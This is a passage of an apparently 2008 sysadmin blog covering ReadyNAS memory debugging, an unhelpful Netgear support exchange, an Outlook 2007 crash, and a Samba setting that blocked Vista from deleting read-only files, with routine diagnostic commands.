8     1    2947896 sda1
8     2          1 sda2
8     5     192748 sda5
8    16  584888320 sdb
8    17  584886456 sdb1
8    32  584888320 sdc
8    33  584886456 sdc1
8    48  584888320 sdd
8    64  584888320 sde

sd[b-e] are the same disk, through each portal. You’ll notice it only shows a partition on two of the four; that’s the controller that is the “preferred path”. If we switch the preferred controller, the disks that are usable switch to the other pair. Again, I’m assuming dm_multipath will clean that up.

netgear support fail

I’ve been trying to deal with a linux appliance’s memory problems for a while, here, and here. Because Netgear/Infrant’s build system removes binaries post-dpkg, it’s not really a full system and I sort of gave up debugging when I kept running into missing binaries (like strace). Some good people helped out (Thanks Mike Fedyk) but I went and opened a trouble ticket with netgear hoping to get to talk to an actual developer on the thing. They must exist somewhere, I can’t imagine netgear let them all go when they bought infrant or anything.

1) Netgear’s support site is terrible. There is no ‘go to support.netgear.com, hit the knowledge base’. Support is achieved, of all places, through product registration, under online support submissions (6).

2) The Readynas people have a nice forum, and it’s product specific. There’s a blog and everything, which is cool. But my thread stopped getting responses from them last week. No “I don’t know” or anything; they just stopped responding to me.

3) So I opened the ticket with Netgear, and they respond with:

The Hardware Compatibility List Memory list/page http://www.readynas.com/?page_id=83

It’s the only guideline we have and if it’s not on the list its not supported nor with the scope of support we provide.

You question is already in the best place for an answer. The moderators are will pass all applicable data to the engineering staff as needed.

Totally in response to like, my first post of the thread, somehow ignoring the rest of it. In a hurry, fine.

4) I reply saying there’s a problem with the product and I need escalation. Escalation closes my ticket and responds with:

The forum where are posting is run by our Engineering Team. For your reference, the members of our team use Star Wars (TM) type names. Considering the kind of issue that you are having, you will have to correspond with them, as we at NETGEAR Level 1 and Level 2 Support cannot assist you with this type of issue.

We appreciate your patience and understanding.

The implication that I still have patience at this point is nice of them, however totally wrong.

Outlook 2007 Crash, junk mail filters / imf?

This is a fun one; by fun I mean I just got to spend six hours on it sans lunch.

Outlook 2007 crashing on startup on Vista.

Log Name: Application
Source: Application Error
Date: 5/14/2008 12:09:46 PM
Event ID: 1000
Task Category: (100)
Level: Error
Keywords: Classic
User: N/A
Computer: vistabob

Description:
Faulting application OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, faulting module OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, exception code 0xc0000005, fault offset 0x004a3d0a, process id 0x308, application start time 0x01c8b5f606eba5ae.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Application Error" />
<EventID Qualifiers="0">1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2008-05-14T19:09:46.000Z" />
<EventRecordID>13251</EventRecordID>
<Channel>Application</Channel>
<Computer>vistabob</Computer>
<Security />
</System>
<EventData>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>c0000005</Data>
<Data>004a3d0a</Data>
<Data>308</Data>
<Data>01c8b5f606eba5ae</Data>
</EventData>
</Event>


Things I tried.

  • Ran scanpst on all pst files. Did see an error about the junk mail list being full.
  • Removed a recent office update to the junk mail filter.
  • Restored to the last system restore point before a glob of overnight office updates.
  • Opened the mailbox in another profile; worked fine, emptied deleted items.
  • Opened the mailbox in a new profile on another computer with 2007/XP; crashed.
  • Opened the mailbox in OWA; worked fine.
  • Turned off junk mail filtering in OWA; lists were empty, so added an address to each list.
  • Used the MAPI editor to remove the junk mail rule on the inbox; inconsequential.

And the winner is! Opened up mailbox in outlook 2003.

Yup, then it worked fine in 2007. Great times.

more linux memory debugging

I downgraded to an earlier version of Raidiator on Friday and saw no improvement in the memory black hole over the weekend. The frustrating part is being unable to tell where it is going, rather than trying to fix the problem with a particular daemon that I may not have the customized source for. My earlier blog entry about this is here. There’s more data from today in the netgear forum thread.

I did find this LKML thread by Mike Fedyk who did most of the upgrades to the munin memory script for 2.6. I can see in the thread that he decided to use the Total-Free-everythingelse=AppsUsed calculation, and I don’t see any big light bulbs in that thread to help solve my problem. I see on the net that someone that used to idle in #swn on irc is connected to a Mike Fedyk, so I’ve emailed him asking for an introduction before I try to harass him directly with the problem. I’m going to assume this is his LJ with a post about performance tuning.

My munin-users thread can be found here, for the record. I’m going to look around for more utilities to track down memory usage, although the lkml thread makes me feel like that may not be happening. I posted in the netgear thread asking for a kernel upgrade but the best advice I’ve gotten there so far is “our perl may be broken. stop running munin” so I’m not sure anyone technical is listening.

Linux Memory Usage

I’ve been trying to debug some memory problems on a ReadyNAS 1100. It has munin-node running, and I see the ‘app’ memory slowly rise something like 50-100MB a day. What’s odd is that Munin reports that it’s using 230MB of ram for ‘apps’ while memstat only reports 118224k (118MB or so), making it difficult to track down where the memory is going.

‘free’ and ‘/proc/meminfo’ only report the amount of free memory, and the amount of memory in buffers, cache, and other little kernel bits. There’s no clear value for memory used. Munin calculates the used memory by subtracting those other bits from the memory total. I can’t find a lot of information about meminfo beyond these sorts of descriptive bits about what each value means. It seems that if memory is allocated, but not to buffers or cache or other small things, we assume it’s used by applications, but that doesn’t pan out with the tools that I can find to tell me how much memory an application is using.
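Roughly, the ‘apps’ number is whatever is left of MemTotal after subtracting the fields the plugin knows about. A sketch of that arithmetic straight from /proc/meminfo; the exact field list munin subtracts may differ, and fields missing on an older kernel simply count as zero here:

awk '/^(MemTotal|MemFree|Buffers|Cached|SwapCached|Slab|PageTables|VmallocUsed):/ { m[$1] = $2 }
END { print m["MemTotal:"]-m["MemFree:"]-m["Buffers:"]-m["Cached:"]-m["SwapCached:"]-m["Slab:"]-m["PageTables:"]-m["VmallocUsed:"], "kB apps" }' /proc/meminfo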

The description here of the difference between VSZ (virtual size) and RSS (resident set size) is useful for looking at ‘ps aux’ output, but there’s nothing there that is using a ton of memory, and its count feels pretty close to that generated by ‘memstat’.
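For comparison, summing RSS over the whole process table is a quick sanity check (this assumes a procps ps, and shared pages get counted more than once, so it will overshoot a bit):

ps -eo rss= | awk '{ sum += $1 } END { print sum, "kB total RSS" }'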

The smugmug discussion about swappiness is interesting, as that was originally my problem because running out of memory with vm.swappiness set to 0 got the OOM killer going buck wild.  This discussion has recently made it to the lkml.

I’ll probably post to the lkml if I don’t figure something out this afternoon, as I’ve been staring at a lot of numbers lately.

Vista says you need permission to perform this action

Man this is annoying. A file tree ended up with a .svn folder which contains files marked read-only. When copied with Vista all is fine until you try to delete the folder, when you’re told “you need permission to perform this action” with “try again” and “cancel” options; trying again many times didn’t do as much as I would have hoped. Eventually we found the files with the read-only attributes. These files are stored on a samba server so I suppose I’ll see if I can get samba or a cron script to strip those attributes. Removing the read-only attribute allows you to delete the file, but I can’t find any way to enable the old XP style dialog that tells you it is marked read-only but allows you to delete it anyways if you have permissions. UAC is off, by the way.
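For the cron script idea, something like this would do it, assuming the DOS read-only flag is mapped onto the owner write bit (samba’s default ‘map read only = yes’ behaviour) and with a made-up share path:

# restore the owner write bit on anything that lost it, which clears the DOS read-only flag
find /shares/code -type f ! -perm -200 -exec chmod u+w {} \;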

update:

Raidiator, the debian based distro that runs on Infrant (I always say infarant) / Netgear ReadyNAS products, has ‘store dos attributes = 1’ in the global section of /etc/samba/smb.conf. This stores the read-only / hidden / archive / system attributes in an extended attribute called user.DOSATTRIB:

getfattr -d entries
# file: entries
user.DOSATTRIB="0x21"

Normally this is off and newer versions of samba use ‘map read only’ to determine what read only should be set to, based on the user write bit (default) (yes), the effective permissions of the user (permissions), or ignoring permissions and only using ‘store dos attributes’ (no).

I put ‘store dos attributes = 0’ in the share definition to override the global (/etc/frontview/samba/Shares.conf in raidiator) and reloaded samba (/etc/init.d/samba reload), and then the file’s properties showed that it was not read-only any longer, thus working around the problem of Vista not letting me delete read-only files.
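For reference, the share-level override amounts to nothing more than this; the share name and path here are made up, and on the ReadyNAS the share stanzas live in /etc/frontview/samba/Shares.conf as noted above:

[code]
        path = /c/code
        store dos attributes = 0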